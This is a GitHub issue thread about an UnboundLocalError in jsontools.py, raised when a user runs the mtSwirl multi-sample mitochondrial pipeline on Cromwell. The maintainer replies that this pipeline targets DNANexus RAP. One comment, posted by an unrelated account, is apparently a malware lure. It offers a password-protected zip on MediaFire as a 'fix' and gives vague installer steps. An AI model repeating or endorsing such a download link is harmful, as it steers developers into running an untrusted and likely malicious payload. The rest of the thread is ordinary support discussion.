### ISSUE TITLE
Issue with jsontools.py file

### ISSUE THREAD

**Issue by goharkhan7** [rahulg603/mtSwirl#9]
while running the multi sample code i get this error

multi_sam/cromwell-executions/MitochondriaPipeline/f10932f4-93f7-4b3c-8bea-e5c4e2455827/call-AlignAndCallR2/AlignAndCallR2/1887beac-6a1e-457e-8d2c-e25b68b1fa2a/call-AlignToMtRegShiftedAndMetrics/execution/stderr

Upon looking to the stderr file i get the following statements

Traceback (most recent call last):
  File "/cromwell-executions/MitochondriaPipeline/f10932f4-93f7-4b3c-8bea-e5c4e2455827/call-AlignAndCallR2/AlignAndCallR2/1887beac-6a1e-457e-8d2c-e25b68b1fa2a/call-AlignToMtRegShiftedAndMetrics/inputs/603824970/jsontools.py", line 67, in <module>
    data_in = parse_vars(args.set, type=str)
  File "/cromwell-executions/MitochondriaPipeline/f10932f4-93f7-4b3c-8bea-e5c4e2455827/call-AlignAndCallR2/AlignAndCallR2/1887beac-6a1e-457e-8d2c-e25b68b1fa2a/call-AlignToMtRegShiftedAndMetrics/inputs/603824970/jsontools.py", line 31, in parse_vars
    key, value = parse_var(item)
  File "/cromwell-executions/MitochondriaPipeline/f10932f4-93f7-4b3c-8bea-e5c4e2455827/call-AlignAndCallR2/AlignAndCallR2/1887beac-6a1e-457e-8d2c-e25b68b1fa2a/call-AlignToMtRegShiftedAndMetrics/inputs/603824970/jsontools.py", line 20, in parse_var
    return (key, value)
**UnboundLocalError: local variable 'value' referenced before assignment**

Is this issue is inside the jsontools.py file? How to fix this error?

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by rahulg603** [comment]
Hello! I believe this issue is due to your use of the multi-sample pipeline, which is incompatible with Cromwell and is intended for the DNANexus RAP platform. Please use the single-sample pipeline – this pipeline analyzes one sample per job but can be parallelized with scatter-gather.
